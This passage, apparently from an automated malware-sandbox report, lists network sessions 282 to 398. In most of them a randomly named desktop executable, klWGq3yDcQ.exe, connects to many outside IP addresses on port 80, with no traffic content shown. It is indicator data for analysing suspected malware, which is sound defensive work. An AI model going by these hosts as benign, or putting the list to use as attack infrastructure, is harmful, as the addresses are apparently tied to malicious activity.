                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    282192.168.2.460199162.250.126.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    283192.168.2.460202172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    284192.168.2.459939148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    285192.168.2.46017081.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    286192.168.2.46005713.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    287192.168.2.46035515.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    288192.168.2.460159191.6.210.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    289192.168.2.460494104.200.30.31806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    290192.168.2.46029735.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    291192.168.2.460017148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    292192.168.2.46029081.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    293192.168.2.460485103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    294192.168.2.460161120.88.73.238806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    295192.168.2.46061815.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    296192.168.2.460435185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    297192.168.2.460436185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    298192.168.2.46051881.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    299192.168.2.460649162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    300192.168.2.46060781.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    301192.168.2.460743192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    302192.168.2.46077152.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    303192.168.2.46073666.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    304192.168.2.460604133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    305192.168.2.460547117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    306192.168.2.460687133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    307192.168.2.460825191.252.51.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    308192.168.2.460639164.52.221.51806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    309192.168.2.46149192.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    310192.168.2.46163776.223.105.230806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    311192.168.2.46172154.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    312192.168.2.46173915.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    313192.168.2.461756192.124.249.13806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    314192.168.2.46173568.168.209.252806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    315192.168.2.461751172.96.186.206806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    316192.168.2.461623103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    317192.168.2.46182476.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    318192.168.2.46179815.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    319192.168.2.46190152.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    320192.168.2.461655104.247.74.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    321192.168.2.4618993.94.41.16780
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    322192.168.2.46187813.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    323192.168.2.46190815.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    324192.168.2.461922185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    325192.168.2.461632109.168.109.224806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    326192.168.2.461852192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    327192.168.2.46175435.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    328192.168.2.461905104.21.63.202806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    329192.168.2.461760185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    330192.168.2.46190772.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    331192.168.2.46194135.237.190.156806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    332192.168.2.46175881.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    333192.168.2.46175718.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    334192.168.2.461876199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    335192.168.2.46182381.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    336192.168.2.46187589.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    337192.168.2.46187989.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    338192.168.2.461923139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    339192.168.2.46179215.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    340192.168.2.46179115.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    341192.168.2.46164566.81.203.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    342192.168.2.46161174.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    343192.168.2.461652178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    344192.168.2.46163413.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    345192.168.2.461793191.6.210.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    346192.168.2.46175913.234.155.5480
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    347192.168.2.461933202.226.37.158806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    348192.168.2.461939148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    349192.168.2.461945117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    350192.168.2.461829148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    351192.168.2.46206815.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    352192.168.2.462069159.203.32.4806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    353192.168.2.462077185.230.63.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    354192.168.2.462114185.230.63.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    355192.168.2.462151185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    356192.168.2.46217654.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    357192.168.2.4621883.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    358192.168.2.462167162.250.126.580
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    359192.168.2.462178162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    360192.168.2.462164104.26.12.245806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    361192.168.2.46219672.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    362192.168.2.462356162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    363192.168.2.462161185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    364192.168.2.46218215.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    365192.168.2.46217799.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    366192.168.2.46220834.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    367192.168.2.46218381.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    368192.168.2.46221181.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    369192.168.2.462168213.0.13.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    370192.168.2.462179194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    371192.168.2.462297139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    372192.168.2.46229534.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    373192.168.2.462150133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    374192.168.2.46248213.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    375192.168.2.46248115.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    376192.168.2.46248415.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    377192.168.2.46248368.168.209.25280
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    378192.168.2.46248615.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    379192.168.2.462191164.52.221.51806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    380192.168.2.462520192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    381192.168.2.46266015.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    382192.168.2.462696104.200.30.31806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    383192.168.2.46280415.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    384192.168.2.46283047.246.24.211806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    385192.168.2.46283615.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    386192.168.2.46291115.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    387192.168.2.462913192.124.249.13806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    388192.168.2.46270566.81.203.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    389192.168.2.46291215.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    390192.168.2.462832172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    391192.168.2.46291468.168.209.252806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    392192.168.2.46291715.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    393192.168.2.46294676.223.105.230806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    394192.168.2.46295252.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    395192.168.2.46274781.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    396192.168.2.462945192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    397192.168.2.462842199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    398192.168.2.462967144.202.62.131806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


